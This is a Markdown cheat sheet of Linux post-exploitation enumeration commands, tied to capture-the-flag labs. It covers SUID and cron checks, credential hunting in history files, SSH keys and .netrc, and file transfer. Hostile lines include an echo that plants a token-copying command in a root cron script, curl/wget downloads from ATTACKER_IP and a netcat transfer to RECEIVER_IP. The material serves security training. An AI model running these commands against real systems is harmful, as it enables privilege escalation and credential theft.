# Linux Enumeration
## Table of Contents
- Subdirectories
- Overview
- System Information
- User and Group Enumeration
- Sudo and Privilege Checks
- SUID and SGID Binaries
- Scheduled Jobs (Cron)
- World-Writable Files and Directories
- File System Enumeration
- Environment Variables
- Credential Hunting
- Network Information
- Transferring Files Between Hosts
- References
## Subdirectories
| Directory | Description |
|---|---|
| `ssh-brute-force/` | Gaining SSH access via credential brute-forcing with Hydra |
| `suid-path-hijack/` | Privilege escalation via SUID binaries calling commands without absolute paths |
| `rce/` | Remote code execution via vulnerable services and file processing pipelines |
## Overview
Post-exploitation enumeration commands for Linux systems. The goal is to systematically gather information about the system, users, running services, file permissions, and scheduled tasks to identify potential privilege escalation paths.
## System Information

```bash
# Hostname
hostname
# OS and kernel version
uname -a
cat /etc/os-release
# Current user and identity
whoami
id
# All logged-in users
who
w
# Recently logged-in users
last
lastlog
```
## User and Group Enumeration

```bash
# List all users
cat /etc/passwd
# List all groups
cat /etc/group
# Current user's group memberships
groups
id
```
## Sudo and Privilege Checks
Always check sudo privileges first. It is the quickest path to root if misconfigured.

```bash
# Check what the current user can run with sudo
sudo -l
# Check sudo version (may be vulnerable)
sudo --version
```

If `sudo -l` returns nothing useful or is denied, move on to SUID binaries and cron jobs.

> **Note:** In restricted shell environments, sudo may be overridden. Check `/etc/profile` and environment setup files to understand what commands are actually available and whether standard tools have been replaced or restricted. See Environment Variables below.
## SUID and SGID Binaries
SUID (Set User ID) binaries execute with the permissions of the file owner (usually root) regardless of who runs them.
SGID (Set Group ID) binaries execute with the permissions of the file's group.
Both are common privilege escalation vectors.

```bash
# Find all SUID binaries
find / -perm /4000 -ls 2>/dev/null
# Find all SGID binaries
find / -perm /2000 -ls 2>/dev/null
# Find all SUID and SGID binaries combined
find / -perm /6000 -ls 2>/dev/null
# Simpler output: paths to regular files only, no permission errors
find / -perm -4000 -type f 2>/dev/null
```

### What to Look For with SUID and SGID Search Results
Compare output against the standard set of SUID binaries (`passwd`, `sudo`, `mount`, `su`, etc.). Any non-standard binary is worth investigating, especially those in `/usr/local/bin/` or `/opt/`.

When you find a suspicious SUID binary:

```bash
# Identify file type — script or ELF binary?
file /path/to/binary
# Look for embedded commands called without absolute paths
strings /path/to/binary | grep -E "^[a-z]{2,10}$"
```

A binary that calls a command without an absolute path (e.g., `ls -l %s` instead of `/bin/ls -l %s`) is vulnerable to PATH hijacking. See `suid-path-hijack/` for the full technique.

Also look for non-standard SUID binaries that wrap legitimate tools. For example, a custom `mm` binary with SUID set that internally calls `less`. The `less` binary itself may have exploitable CVEs that, combined with SUID execution, allow privilege escalation via environment variables like `LESSOPEN` or `LESSCLOSE`. See `rce/` for an example of this technique.
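The baseline comparison described above, written as a small audit helper. This is an added example, not code from the original page: the baseline list and the sample `find` output are constructed for a Debian-style layout and should be replaced with the list from a clean reference install of the distribution being reviewed.

```bash
#!/bin/sh
# Added example: compare the SUID binaries found on a host against a
# known-good baseline so that only unexpected entries need manual review.

# Constructed baseline of SUID binaries normally present on a Debian/Ubuntu
# host (an assumption; build the real list from a clean reference install).
SUID_BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp'

# Print every path in $1 (one per line, as produced by find -type f) that is
# not an exact line of the baseline. Exact matching (grep -Fx) matters: a
# substring test would accept a rogue /bin/su because the baseline line
# /usr/bin/su contains it.
flag_nonstandard_suid() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_BASELINE" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Live variant: run the page's find command and pass its output to the check.
audit_live_suid() {
    flag_nonstandard_suid "$(find / -perm -4000 -type f 2>/dev/null)"
}

# Constructed sample of find output (not captured from a real host) with two
# entries outside the baseline: a custom wrapper in /usr/local/bin and a
# helper under /opt.
SAMPLE_FIND_OUTPUT='/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/local/bin/mm
/opt/backup/runner'

flag_nonstandard_suid "$SAMPLE_FIND_OUTPUT"
# Prints /usr/local/bin/mm and /opt/backup/runner, nothing else
```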
## Scheduled Jobs (Cron)
Cron jobs running as root that reference world-writable scripts are a reliable privilege escalation path.

```bash
# System-wide crontab
cat /etc/crontab
# Per-user crontabs
crontab -l
# Cron job directories
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
```

### What to Look For
In `/etc/crontab`, identify jobs running as root and check whether the script they call is writable by the current user:

```bash
# Check permissions on a cron script
ls -la /opt/security-sweep
# If world-writable, append a command to execute as root
echo 'cat /root/token.txt >> /tmp/token' >> /opt/security-sweep
# Wait for the cron job to execute, then read the output
cat /tmp/token
```

Alternatively, use `scp` to overwrite the script with a new version from your host:

```bash
# Transfer a modified script to a world-writable cron target
scp -O modified-script user@TARGET:/opt/security-sweep
```

> **Note:** Use the `-O` flag with `scp` to force the legacy SCP protocol if the default SFTP transfer fails.
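The root-job permission check above, automated for a whole system crontab. This is an added example, not code from the original page: it parses text in `/etc/crontab` format, keeps only root jobs whose command is an absolute path, and reports targets that are world-writable or missing; the crontab is passed in as a string so the constructed sample runs without reading the real `/etc/crontab`.

```bash
#!/bin/sh
# Added example: find root cron jobs whose script could be modified by an
# unprivileged user. The crontab is passed as text so the check can run
# against a constructed sample as well as against the live /etc/crontab.

# Print "user command" for each job line in /etc/crontab format
# (m h dom mon dow user command); comments, blank lines and VAR=value
# assignments are skipped, and only the first word of the command is kept.
cron_jobs() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*#/                 { next }   # comment line
        NF == 0                    { next }   # blank line
        /^[A-Za-z_][A-Za-z0-9_]*=/ { next }   # environment assignment
        NF >= 7                    { print $6, $7 }
    '
}

# Report root jobs whose target (absolute paths only) is missing or has the
# others-write bit set. ls -ld is used instead of stat because its mode
# string is the same on GNU and BSD userlands; column 9 is the o+w bit.
flag_writable_root_jobs() {
    cron_jobs "$1" | while read -r user cmd; do
        [ "$user" = root ] || continue
        case "$cmd" in /*) ;; *) continue ;; esac
        if [ ! -e "$cmd" ]; then
            printf 'missing %s\n' "$cmd"
        elif [ "$(ls -ld -- "$cmd" | cut -c9)" = w ]; then
            printf 'world-writable %s\n' "$cmd"
        fi
    done
}

# Live variant against the host's system crontab.
audit_live_crontab() {
    flag_writable_root_jobs "$(cat /etc/crontab)"
}

# Constructed sample crontab (not read from a host); /opt/security-sweep is
# the path used in the text above, so on most systems it is reported missing.
SAMPLE_CRONTAB='SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *  * * *  root   cd / && run-parts --report /etc/cron.hourly
*/5 * * * *  root   /opt/security-sweep
0 3   * * *  backup /usr/local/bin/rotate-logs.sh'

flag_writable_root_jobs "$SAMPLE_CRONTAB"
```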
## World-Writable Files and Directories

```bash
# World-writable directories
find / -xdev -type d -perm -0002 -ls 2>/dev/null
# World-writable files
find / -xdev -type f -perm -0002 -ls 2>/dev/null
```
Cross-reference world-writable files against cron jobs and SUID binaries. A world-writable script called by a root cron job or SUID binary is an immediate escalation path.
Common world-writable locations include `/tmp`, `/var/tmp`, and `/run/lock`. These are expected to be world-writable and are safe to use for staging payloads.
## File System Enumeration

```bash
# Files in the current directory (verbose)
find . -ls
# Files in the user's home directory
ls -asl ~
# Files under /opt (often contains custom apps and scripts)
find /opt -ls 2>/dev/null
# Find files owned by root but readable by current user
find / -user root -readable -type f 2>/dev/null
# Find recently modified files
find / -mmin -10 -type f 2>/dev/null
# Find files with specific name patterns
find / -name "token*" -type f 2>/dev/null
find / -name "*.txt" -readable -type f 2>/dev/null
```
## Environment Variables
Environment variables can reveal sensitive information and exploitation opportunities, particularly when SUID binaries or tools like `less` are involved.

```bash
# Print all environment variables
env
printenv
# Check profile and shell configuration files
cat /etc/profile
cat ~/.bashrc
cat ~/.bash_profile
cat ~/.profile
```

### What to Look For With Environment Variables
- Restricted `PATH`: a limited `PATH` in `/etc/profile` signals a restricted shell environment. Check which commands are symlinked or available.
- `LESSOPEN`/`LESSCLOSE`: if set, and `less` (or a SUID binary wrapping it) is available, these can be exploited for command injection via CVE-2024-32487 or CVE-2022-48624.
- Hardcoded credentials: API keys, passwords, or tokens occasionally appear in environment variables set by poorly configured applications.
## Credential Hunting

```bash
# Search for passwords in config files
grep -r "password" /etc/ 2>/dev/null
grep -r "passwd" /home/ 2>/dev/null
# Check bash history
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
# Search for SSH private keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_ed25519" 2>/dev/null
find / -name "*.pem" 2>/dev/null
# Check SSH config for known hosts and keys
cat ~/.ssh/config 2>/dev/null
cat ~/.ssh/known_hosts 2>/dev/null
# Check for stored credentials
cat ~/.netrc 2>/dev/null
```
## Network Information

```bash
# Network interfaces and IP addresses
ip a
ifconfig
# Routing table
ip route
netstat -rn
# Active connections and listening ports
ss -tulnp
netstat -tulnp
# Hosts file — may reveal internal hostnames
cat /etc/hosts
# DNS configuration
cat /etc/resolv.conf
```

> **Tip:** Services may be listening on non-standard ports not visible to an external Nmap scan. Check internally with `ss -tulnp` to find ports that are only accessible from within the host or local network. Always supplement external scanning with a full port scan (`nmap -p-`) to catch services on high port numbers.

> **Tip:** If port 22 is open and you have a suspected username, SSH brute-forcing is worth attempting before deeper enumeration. See `ssh-brute-force/` for the full technique using Hydra.
## Transferring Files Between Hosts

### HTTP Server (Python)
Useful for pulling files from your attack host onto a compromised target.

```bash
# On the attack host — serve files from current directory
sudo python3 -m http.server 80
# On the target — download a file
curl http://ATTACKER_IP/file.ext -o file.ext
wget http://ATTACKER_IP/file.ext
```

### SCP (Secure Copy)

```bash
# Push a file from attack host to target
scp -O localfile user@TARGET:/remote/path/
# Pull a file from target to attack host
scp -O user@TARGET:/remote/path/file .
```

> **Note:** Use `-O` to force the legacy SCP protocol if the default SFTP mode fails.

### Netcat

```bash
# On the receiving end
nc -lvnp 4444 > received_file
# On the sending end
nc RECEIVER_IP 4444 < file_to_send
```
## References

### Challenges
| Source | Name |
|---|---|
| Immersive Labs: Haunted Hollow | Lab 9 - Mirrored Mayhem |
| Immersive Labs: Return to Haunted Hollow | Lab 6 - Haunted Helpdesk |
| Holiday Hack Challenge 2024, Act I | Hardware Part II |